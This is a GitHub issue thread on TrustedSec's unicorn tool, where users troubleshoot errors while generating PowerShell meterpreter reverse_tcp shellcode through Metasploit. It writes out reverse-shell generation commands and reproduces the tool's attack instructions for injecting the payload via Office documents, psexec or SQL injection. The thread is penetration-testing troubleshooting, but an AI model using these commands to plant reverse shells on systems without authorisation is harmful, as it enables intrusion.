### ISSUE TITLE
python version for generate payload

### ISSUE THREAD

**Issue by edenanthony** [trustedsec/unicorn#31]
Hi

I'm using all version of python for generate shellcode, but i receive error : 

python2.7 unicorn.py payload/windows/meterpreter/reverse_tcp 45.45.45.45 445
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Length of shellcode was not generated. Check payload name and if Metasploit is working and try again.
Exiting....

python >= 3 :

python3.5 unicorn.py payload/windows/meterpreter/reverse_tcp 45.45.45.45 445
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Something went wrong, printing the error: name 'reduce' is not defined

Of course i install all dependency of python packages.
 How solved it?

TNX

**Comment by decidedlygray** [comment]
Try this: use python 2.7 and remove `payload/`

Giving you this command:
```
python2.7 unicorn.py windows/meterpreter/reverse_tcp 45.45.45.45 445
```

**Comment by edenanthony** [comment]
Don't work

python2.7 unicorn.py windows/meterpreter/reverse_tcp 45.45.45.45 445
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Length of shellcode was not generated. Check payload name and if Metasploit is working and try again.
Exiting....

**Comment by decidedlygray** [comment]
On the machine this issue is happening on, what is the output of this command:

```
msfvenom -h
```

Are you sure metasploit is installed and working properly? Sorry, just trying to help troubleshoot

**Comment by edenanthony** [comment]
thank you for attention

yes, metasploit is installed and working properly and i can generate payload with msfvenom correctly

**Comment by trustedsec** [comment]
Something def up with your Metasploit install:

root@stronghold:/home/relik/Desktop/git/unicorn# python2.7 unicorn.py windows/meterpreter/reverse_tcp 45.45.45.45 445
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...

                                                         ,/
                                                        //
                                                      ,//
                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:
                
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave

Happy Magic Unicorns.

[********************************************************************************************************]

				-----POWERSHELL ATTACK INSTRUCTIONS----

Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all
of the code needed in order to inject the powershell attack into memory. Note you will need a place that
supports remote command injection of some sort. Often times this could be through an excel/word  doc or
through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and  scenarios to
where you can use this attack at. Simply paste the powershell_attacks.txt command in any command prompt
window or where you have the ability to call the powershell executable and it will give a shell back to
you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter
payloads.

Note that you will need to have a listener enabled in order to capture the attack.

[*******************************************************************************************************]
	
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.

root@stronghold:/home/relik/Desktop/git/unicorn#

**Comment by Raytri3** [comment]
I know this is an old thread but I figured I would add a comment since I just ran into this problem as well (self inflicted). I had a typo in (meRtepeter instead of meteRpeter) - double check spelling of everything.

**Comment by vinnytroia** [comment]
I spent the last 4 hours trying to figure this out. The problem is the gemset rules not being applied outside of the /opt/metasploit/ folder. 

Inside the metasploit folder: 
rvm gemset --list

you should see metasploit-framework selected as the gemset. 

outside the folder run the same command: 
rvm gemset --list

in my case, default was selected. 

big props to Carlos Perez's blog for this solution: 
Run this command OUTSIDE the metasploit folder: 
rvm --default use ruby.x.x.x@metasploit-framework

re-run unicorn.
